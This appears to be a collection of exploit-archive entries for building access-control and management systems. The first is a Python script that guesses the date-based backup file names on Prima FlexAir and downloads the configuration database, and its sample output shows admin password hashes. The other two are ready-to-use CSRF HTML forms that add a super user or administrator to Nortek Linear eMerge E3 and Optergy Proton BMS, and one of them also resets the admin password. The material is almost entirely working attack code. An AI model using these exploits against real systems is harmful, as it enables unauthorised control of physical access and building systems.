Prima FlexAir Access Control version 2.3.35 database backup predictable name exploit.


MD5 | 1549dfc10ce0890c7b4cd26ea0d2fab6

#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# CVE: CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetchin the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$
#
###################################################################################
#
# 11.01.2019
#

import os
import sys
import time
import requests

from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '[+] Usage: '+piton+' [target]'
    print '[+] Target example 1: http://10.0.0.17:8080'
    print '[+] Target example 2: https://primanova.tld\n'
    sys.exit()

host = sys.argv[1]

def datum(start_date, end_date):
    # yield every calendar day from start_date up to (not including) end_date
    for n in range(int((end_date - start_date).days)):
        yield start_date + timedelta(n)

start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)

print '[+] Please wait while fetchin the backup config file...'

def spinning_cursor():
    while True:
        for cursor in '|/-\\':
            yield cursor

spinner = spinning_cursor()

# the backup file name only varies by date, so walk the date range
for mooshoo in datum(start_date, end_date):
    sys.stdout.write(next(spinner))
    sys.stdout.flush()
    time.sleep(0.1)
    sys.stdout.write('\b')
    h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)

    if h.status_code == 200:
        print '[+] Found some juice!'
        print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
        timestr = time.strftime('%H%M%S')
        time.sleep(1)
        open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
        print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
        sys.exit()

print '[-] No backup for you today. :('

Nortek Linear eMerge E3 Access Control Cross Site Request Forgery


Nortek Linear eMerge E3 suffers from a cross site request forgery vulnerability.


MD5 | f71c4e9823f6f1c6a4f6c324fdf7a349


Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery

CVE: CVE-2019-7262
Advisory: https://applied-risk.com/resources/ar-2019-005
Discovered by Gjoko 'LiquidWorm' Krstic

<!-- CSRF Add Super User -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=insert" method="POST">
<input type="hidden" name="No" value="" />
<input type="hidden" name="ID" value="hax0r" />
<input type="hidden" name="Password" value="hax1n" />
<input type="hidden" name="Name" value="CSRF" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Add Super User" />
</form>
</body>
</html>

<!-- CSRF Change Admin Password -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=update" method="POST">
<input type="hidden" name="No" value="1" />
<input type="hidden" name="ID" value="admin" />
<input type="hidden" name="Password" value="backdoor" />
<input type="hidden" name="Name" value="admin" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Change Admin Password" />
</form>
</body>
</html>


Optergy Proton/Enterprise BMS 2.0.3a Cross Site Request Forgery


Optergy Proton/Enterprise BMS versions 2.0.3a and below suffer from an add administrator cross site request forgery vulnerability.


MD5 | a768874e4b9ab3e96f1cbbb3d402a43b


Optergy Proton/Enterprise BMS CSRF Add Admin

Affected version: <=2.0.3a
Advisory: https://applied-risk.com/resources/ar-2019-008
CVE: CVE-2019-7273
Discovered by Gjoko 'LiquidWorm' Krstic

<!-- CSRF Add Admin Exploit -->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST">
<input type="hidden" name="user.accountEnabled" value="true" />
<input type="hidden" name="user.username" value="testingus" />
<input type="hidden" name="user.password" value="testingus" />
<input type="hidden" name="confirmPassword" value="testingus" />
<input type="hidden" name="user.firstname" value="Tester" />
<input type="hidden" name="user.lastname" value="Testovski" />
<input type="hidden" name="user.companyName" value="TEST Inc." />
<input type="hidden" name="user.address" value="TestStr 17-251" />
<input type="hidden" name="user.emailAddress" value="aa@bb.cc" />
<input type="hidden" name="user.departmentId" value="" />
<input type="hidden" name="user.phoneNumber" value="1112223333" />
<input type="hidden" name="user.mobileNumber" value="1233211234" />
<input type="hidden" name="securityLevel" value="10" />
<input type="hidden" name="user.showBanner" value="true" />
<input type="hidden" name="user.showMenu" value="true" />
<input type="hidden" name="user.showAlarmTab" value="true" />
<input type="hidden" name="user.visibleAlarms" value="0" />
<input type="hidden" name="user.showBookmarks" value="true" />
<input type="hidden" name="user.showNotificationTab" value="true" />
<input type="hidden" name="user.autoDismissFeedback" value="true" />
<input type="hidden" name="user.canChangeBookmarks" value="true" />
<input type="hidden" name="user.canChangePassword" value="true" />
<input type="hidden" name="user.canUpdateProfile" value="true" />
<input type="hidden" name="homepage-text" value="" />
<input type="hidden" name="user.homePageType" value="" />
<input type="hidden" name="user.homePage" value="" />
<input type="hidden" name="background" value="" />
<input type="hidden" name="user.backgroundImage-text" value="" />
<input type="hidden" name="user.backgroundImage" value="" />
<input type="hidden" name="user.backgroundTiled" value="" />
<input type="hidden" name="user.backgroundColour" value="" />
<input type="hidden" name="newMemberships" value="1" />
<input type="hidden" name="user.id" value="" />
<input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" />
<input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" />
<input type="hidden" name="newPrivileges" value="7" />
<input type="hidden" name="newPrivileges" value="9" />
<input type="hidden" name="newPrivileges" value="8" />
<input type="hidden" name="newPrivileges" value="10" />
<input type="hidden" name="newPrivileges" value="13" />
<input type="hidden" name="newPrivileges" value="14" />
<input type="hidden" name="newPrivileges" value="12" />
<input type="hidden" name="newPrivileges" value="2" />
<input type="hidden" name="newPrivileges" value="3" />
<input type="hidden" name="newPrivileges" value="4" />
<input type="hidden" name="newPrivileges" value="139" />
<input type="hidden" name="newPrivileges" value="138" />
<input type="hidden" name="newPrivileges" value="141" />
<input type="hidden" name="newPrivileges" value="140" />
<input type="hidden" name="newPrivileges" value="124" />
<input type="hidden" name="newPrivileges" value="128" />
<input type="hidden" name="newPrivileges" value="119" />
<input type="hidden" name="newPrivileges" value="19" />
<input type="hidden" name="newPrivileges" value="17" />
<input type="hidden" name="newPrivileges" value="18" />
<input type="hidden" name="newPrivileges" value="20" />
<input type="hidden" name="newPrivileges" value="21" />
<input type="hidden" name="newPrivileges" value="24" />
<input type="hidden" name="newPrivileges" value="23" />
<input type="hidden" name="newPrivileges" value="132" />
<input type="hidden" name="newPrivileges" value="131" />
<input type="hidden" name="newPrivileges" value="134" />
<input type="hidden" name="newPrivileges" value="147" />
<input type="hidden" name="newPrivileges" value="25" />
<input type="hidden" name="newPrivileges" value="135" />
<input type="hidden" name="newPrivileges" value="105" />
<input type="hidden" name="newPrivileges" value="59" />
<input type="hidden" name="newPrivileges" value="142" />
<input type="hidden" name="newPrivileges" value="28" />
<input type="hidden" name="newPrivileges" value="27" />
<input type="hidden" name="newPrivileges" value="102" />
<input type="hidden" name="newPrivileges" value="31" />
<input type="hidden" name="newPrivileges" value="125" />
<input type="hidden" name="newPrivileges" value="30" />
<input type="hidden" name="newPrivileges" value="108" />
<input type="hidden" name="newPrivileges" value="129" />
<input type="hidden" name="newPrivileges" value="33" />
<input type="hidden" name="newPrivileges" value="34" />
<input type="hidden" name="newPrivileges" value="36" />
<input type="hidden" name="newPrivileges" value="37" />
<input type="hidden" name="newPrivileges" value="38" />
<input type="hidden" name="newPrivileges" value="46" />
<input type="hidden" name="newPrivileges" value="127" />
<input type="hidden" name="newPrivileges" value="41" />
<input type="hidden" name="newPrivileges" value="42" />
<input type="hidden" name="newPrivileges" value="45" />
<input type="hidden" name="newPrivileges" value="44" />
<input type="hidden" name="newPrivileges" value="49" />
<input type="hidden" name="newPrivileges" value="48" />
<input type="hidden" name="newPrivileges" value="112" />
<input type="hidden" name="newPrivileges" value="113" />
<input type="hidden" name="newPrivileges" value="117" />
<input type="hidden" name="newPrivileges" value="115" />
<input type="hidden" name="newPrivileges" value="116" />
<input type="hidden" name="newPrivileges" value="133" />
<input type="hidden" name="newPrivileges" value="51" />
<input type="hidden" name="newPrivileges" value="54" />
<input type="hidden" name="newPrivileges" value="56" />
<input type="hidden" name="newPrivileges" value="55" />
<input type="hidden" name="newPrivileges" value="66" />
<input type="hidden" name="newPrivileges" value="67" />
<input type="hidden" name="newPrivileges" value="60" />
<input type="hidden" name="newPrivileges" value="61" />
<input type="hidden" name="newPrivileges" value="62" />
<input type="hidden" name="newPrivileges" value="68" />
<input type="hidden" name="newPrivileges" value="69" />
<input type="hidden" name="newPrivileges" value="103" />
<input type="hidden" name="newPrivileges" value="104" />
<input type="hidden" name="newPrivileges" value="64" />
<input type="hidden" name="newPrivileges" value="65" />
<input type="hidden" name="newPrivileges" value="71" />
<input type="hidden" name="newPrivileges" value="121" />
<input type="hidden" name="newPrivileges" value="122" />
<input type="hidden" name="newPrivileges" value="85" />
<input type="hidden" name="newPrivileges" value="86" />
<input type="hidden" name="newPrivileges" value="74" />
<input type="hidden" name="newPrivileges" value="76" />
<input type="hidden" name="newPrivileges" value="144" />
<input type="hidden" name="newPrivileges" value="75" />
<input type="hidden" name="newPrivileges" value="77" />
<input type="hidden" name="newPrivileges" value="78" />
<input type="hidden" name="newPrivileges" value="79" />
<input type="hidden" name="newPrivileges" value="73" />
<input type="hidden" name="newPrivileges" value="143" />
<input type="hidden" name="newPrivileges" value="109" />
<input type="hidden" name="newPrivileges" value="110" />
<input type="hidden" name="newPrivileges" value="88" />
<input type="hidden" name="newPrivileges" value="89" />
<input type="hidden" name="newPrivileges" value="90" />
<input type="hidden" name="newPrivileges" value="118" />
<input type="hidden" name="newPrivileges" value="95" />
<input type="hidden" name="newPrivileges" value="93" />
<input type="hidden" name="newPrivileges" value="96" />
<input type="hidden" name="newPrivileges" value="94" />
<input type="hidden" name="newPrivileges" value="92" />
<input type="hidden" name="newPrivileges" value="98" />
<input type="hidden" name="newPrivileges" value="99" />
<input type="hidden" name="newPrivileges" value="146" />
<input type="hidden" name="newPrivileges" value="100" />
<input type="submit" value="Forgery" />
</form>
</body>
</html>
